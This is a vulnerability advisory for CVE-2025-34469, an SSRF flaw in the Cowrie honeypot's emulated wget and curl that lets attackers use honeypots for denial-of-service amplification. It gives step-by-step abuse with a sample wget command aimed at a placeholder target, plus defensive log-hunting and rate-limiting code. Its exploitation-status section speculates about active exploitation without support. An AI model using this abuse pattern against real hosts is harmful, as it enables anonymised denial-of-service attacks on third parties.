CVE-2025-34469

Source: disclosure@vulncheck.com

MEDIUM
6.9
Published: December 31, 2025 at 10:15 PM
Modified: January 13, 2026 at 10:10 PM

Vulnerability Description

Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.

CVSS Metrics

Base Score
6.9
Severity
MEDIUM
Vector String
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Weaknesses (CWE)

Source: disclosure@vulncheck.com

AI Security Analysis

01 // Technical Summary

Cowrie honeypot versions prior to 2.9.0 contain a server-side request forgery (SSRF) flaw that lets attackers use the honeypot to launch denial-of-service (DoS) attacks against arbitrary targets. An attacker can invoke the emulated wget and curl commands in the honeypot's shell to generate unbounded real HTTP traffic, hiding their origin behind the honeypot's IP address and amplifying the attack's impact.

02 // Vulnerability Mechanism

Step 1: Access Cowrie Honeypot: The attacker gains access to the Cowrie honeypot, typically through SSH or another supported protocol.

Step 2: Command Injection: The attacker interacts with the emulated shell and crafts a command using wget or curl with a malicious URL as an argument, e.g., wget http://target.example.com/.

Step 3: Outbound Request Trigger: The emulated wget or curl command, lacking input validation, executes a real HTTP request to the attacker-specified target URL.

Step 4: Repeated Exploitation: The attacker repeats Step 2 and Step 3, potentially using scripting or automation, to send a large number of requests to the target.

Step 5: Amplification and DoS: The honeypot, acting as an intermediary, generates a significant volume of traffic towards the target, effectively launching a DoS attack while masking the attacker's IP address.

03 // Deep Technical Analysis

The vulnerability stems from a lack of input validation and rate limiting in Cowrie's emulated wget and curl implementations. The code does not sanitize the user-supplied URL argument, so the emulated command issues a real outbound HTTP request to whatever destination the attacker names. Because no throttling is in place, these commands can be invoked repeatedly to trigger a large number of outbound requests, turning the honeypot into an amplification node that directs a flood of traffic at a chosen target. The root cause is the combination of unrestricted destination URLs and absent request throttling, which together allow uncontrolled outbound requests and enable both the SSRF and the DoS amplification.

04 // Exploitation Status

A **Public PoC** is likely: given the nature of the vulnerability and the free availability of the honeypot software, a proof of concept is highly probable. The ease of exploitation suggests it could be **Actively exploited**.

05 // Threat Intelligence

While no specific APTs are directly linked to this vulnerability at this time, any actor seeking to launch DoS attacks could leverage this. The ease of exploitation makes it attractive to a wide range of attackers. This vulnerability is not currently listed in the CISA KEV catalog, but it is a candidate for inclusion if exploited in the wild.

06 // Detection & Hunting

  • Monitor outbound network traffic from Cowrie honeypot instances for unusual patterns, such as a high volume of requests to a single external IP address or a small set of IPs.

  • Analyze Cowrie logs for suspicious wget or curl command invocations, particularly those with unusual or external URLs.

  • Implement network intrusion detection systems (IDS) with rules to identify and alert on repeated HTTP requests originating from the honeypot to external targets.

  • Monitor for abnormally high CPU or network utilization on the Cowrie honeypot, which could indicate exploitation.

  • Review Cowrie configuration files for any unauthorized modifications or changes to the emulated shell environment.
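The log-based hunt in the bullets above, as an added example that is not part of the original advisory or of Cowrie itself: it reads lines in the shape of Cowrie's JSON log (`cowrie.command.input` events with an `input` field), extracts the destination host of every wget/curl invocation, and flags hosts fetched repeatedly within a sliding time window. The sample lines, field subset and thresholds are constructed for the example.

```python
import json
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit
# Constructed sample lines in the shape of Cowrie's JSON log (eventid, input, src_ip, timestamp).
SAMPLE_LOG = [
    '{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.5","timestamp":"2025-12-31T10:00:00.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"wget http://target.example.com/","src_ip":"203.0.113.5","timestamp":"2025-12-31T10:00:01.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"curl -s http://target.example.com/big.iso","src_ip":"203.0.113.5","timestamp":"2025-12-31T10:00:02.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://target.example.com/","src_ip":"198.51.100.7","timestamp":"2025-12-31T10:00:03.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"wget http://target.example.com/","src_ip":"198.51.100.7","timestamp":"2025-12-31T10:00:04.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"curl http://target.example.com/","src_ip":"198.51.100.7","timestamp":"2025-12-31T10:00:05.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"wget http://mirror.example.org/x.sh","src_ip":"203.0.113.5","timestamp":"2025-12-31T10:05:00.000000Z"}',
]
FETCH_RE = re.compile(r"(?:^|[;&|]\s*)(?:wget|curl)\b")  # command name at start or after a separator
URL_RE = re.compile(r"https?://[^\s'\"]+")

def fetch_events(lines):
    """Yield (time, src_ip, dest_host) for each wget/curl invocation that carries a URL."""
    for line in lines:
        try:
            ev = json.loads(line)
        except ValueError:
            continue
        cmd = ev.get("input", "")
        if ev.get("eventid") != "cowrie.command.input" or not FETCH_RE.search(cmd):
            continue
        ts = datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")
        for url in URL_RE.findall(cmd):
            host = urlsplit(url).hostname
            if host:
                yield ts, ev.get("src_ip"), host

def find_bursts(lines, window=60, threshold=3):
    """Return {dest_host: peak_count} for hosts fetched >= threshold times within any `window` seconds."""
    by_host = defaultdict(list)  # counted across all attacker sessions: the honeypot is the single source
    for ts, _src, host in fetch_events(lines):
        by_host[host].append(ts)
    bursts = {}
    for host, times in by_host.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over the sorted timestamps
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                bursts[host] = max(bursts.get(host, 0), end - start + 1)
    return bursts
```

Run against a real `cowrie.json` with `find_bursts(open(path))`; a single destination with a high peak count across several source IPs is the pattern the advisory describes.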

07 // Remediation & Hardening

  • Upgrade Cowrie to version 2.9.0 or later.

  • Implement input validation to sanitize and restrict the URLs accepted by the emulated wget and curl commands. This could involve whitelisting allowed domains or URL patterns.

  • Introduce rate limiting for outbound HTTP requests originating from the emulated shell. This will limit the number of requests per time unit.

  • Consider disabling or restricting the use of wget and curl within the emulated shell if they are not essential for the honeypot's functionality.

  • Regularly review and audit the Cowrie configuration for any unauthorized changes.

  • Implement a web application firewall (WAF) in front of the honeypot to filter malicious requests.
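The rate-limiting and destination-restriction bullets above, as an added example of how such a gate can be structured; this is a hypothetical helper written for this page, not Cowrie's own implementation or its 2.9.0 fix. It assumes the emulated wget/curl call `allow(host)` before making any real request; the bucket sizes are illustrative, and hostnames are assumed to be resolved and checked against the same address policy elsewhere.

```python
import ipaddress
import time

class OutboundFetchLimiter:
    """Gate for the emulated wget/curl before any real outbound request is made.
    Hypothetical helper, not Cowrie's own code: a token bucket per destination
    host plus a global bucket, and a refusal of non-global literal IP targets."""

    def __init__(self, host_rate=0.2, host_burst=3, global_rate=1.0,
                 global_burst=10, clock=time.monotonic):
        self.host_rate, self.host_burst = host_rate, host_burst
        self.global_rate, self.global_burst = global_rate, global_burst
        self.clock = clock
        self.global_bucket = [global_burst, clock()]  # [tokens, last refill time]
        self.host_buckets = {}

    def _take(self, bucket, rate, burst):
        """Refill the bucket for the elapsed time, then consume one token if available."""
        now = self.clock()
        tokens = min(burst, bucket[0] + (now - bucket[1]) * rate)
        bucket[1] = now
        if tokens >= 1.0:
            bucket[0] = tokens - 1.0
            return True
        bucket[0] = tokens
        return False

    def allow(self, host):
        """Return (allowed, reason) for a request to `host` (literal IP or hostname)."""
        try:
            if not ipaddress.ip_address(host).is_global:
                return False, "non-global address"  # loopback, RFC 1918, link-local, ...
        except ValueError:
            pass  # a hostname: assumed to be resolved and checked the same way later
        bucket = self.host_buckets.setdefault(host, [self.host_burst, self.clock()])
        if not self._take(bucket, self.host_rate, self.host_burst):
            return False, "per-host rate limit"
        if not self._take(self.global_bucket, self.global_rate, self.global_burst):
            bucket[0] += 1.0  # refund the per-host token; nothing was sent
            return False, "global rate limit"
        return True, "ok"
```

A denied request can still be logged and answered with a plausible wget/curl error so the emulation stays convincing while no traffic leaves the honeypot.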

08 // Affected Products

Cowrie versions prior to 2.9.0